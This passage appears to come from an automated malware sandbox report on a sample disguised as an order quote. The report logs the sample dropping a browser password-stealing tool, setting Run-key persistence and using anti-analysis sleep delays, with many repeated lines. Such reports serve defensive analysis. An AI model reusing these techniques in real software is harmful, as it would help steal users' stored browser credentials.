                          Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: Quote for new order 2025.exe, Chrom.exe.0.dr
                          Source: Quote for new order 2025.exeStatic PE information: 0xBB5322FD [Sat Aug 3 20:37:17 2069 UTC]
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_004053E1 LoadLibraryW,GetProcAddress,FreeLibrary,#17,MessageBoxW,4_2_004053E1
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_0798F200 push eax; iretd 0_2_0798F201
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_0798EA18 pushad ; retf 0_2_0798EA19
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5CBE1 push edx; iretd 0_2_09E5CBE2
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5CBE9 push edx; iretd 0_2_09E5CBEA
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5ABF8 pushad ; iretd 0_2_09E5ABF9
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5CBC1 push edx; iretd 0_2_09E5CBC2
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5CBC8 push edx; iretd 0_2_09E5CBCA
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E583A8 push ds; iretd 0_2_09E583AA
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E583B1 push ds; iretd 0_2_09E583B2
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5DBBB pushad ; iretd 0_2_09E5DBD2
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5E308 push esp; iretd 0_2_09E5E309
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5CA90 push ecx; iretd 0_2_09E5CA92
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E57223 push ss; iretd 0_2_09E57226
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5CD60 push ebx; iretd 0_2_09E5CD62
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5CD68 push ebx; iretd 0_2_09E5CD6A
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5CD01 push ebx; iretd 0_2_09E5CD02
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5CD09 push ebx; iretd 0_2_09E5CD0A
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5DD10 pushad ; iretd 0_2_09E5DD12
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5951C pushfd ; iretd 0_2_09E5951D
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5DD19 pushad ; iretd 0_2_09E5DD1A
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5CD18 push ebx; iretd 0_2_09E5CD1A
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5CC90 push edx; iretd 0_2_09E5CC92
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5DC90 pushad ; iretd 0_2_09E5DC92
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5CC98 push edx; iretd 0_2_09E5CC9A
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5DC98 pushad ; iretd 0_2_09E5DC9A
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5CC5F push edx; iretd 0_2_09E5CC62
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5CC3F push edx; iretd 0_2_09E5CC42
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5AC00 push esp; iretd 0_2_09E5AC01
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeCode function: 0_2_09E5DC19 pushad ; iretd 0_2_09E5DC1A
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_00446B75 push ecx; ret 4_2_00446B85
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0044DDB0 push eax; ret 4_2_0044DDC4
                          Source: Quote for new order 2025.exeStatic PE information: section name: .text entropy: 6.87952860455371
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeFile created: C:\Users\user\Desktop\Chrom.exeJump to dropped file
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows ApplicationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows ApplicationJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\Desktop\Chrom.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\Desktop\Chrom.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeMemory allocated: 1550000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeMemory allocated: 3450000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeMemory allocated: 970000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeMemory allocated: 4560000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeMemory allocated: 1140000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeMemory allocated: 2AA0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeMemory allocated: 4AA0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,4_2_0040BAE3
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 7652Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 7652Thread sleep time: -100000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 7652Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 7972Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 7972Thread sleep time: -100000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 1344Thread sleep count: 199 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 7972Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 3848Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 3848Thread sleep time: -100000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 7944Thread sleep count: 200 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exe TID: 3848Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0040B477 FindFirstFileW,FindNextFileW,4_2_0040B477
                          Source: C:\Users\user\Desktop\Chrom.exeCode function: 4_2_0041A8D8 memset,GetSystemInfo,4_2_0041A8D8
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\Quote for new order 2025.exeThread delayed: delay time: 100000Jump to behavior
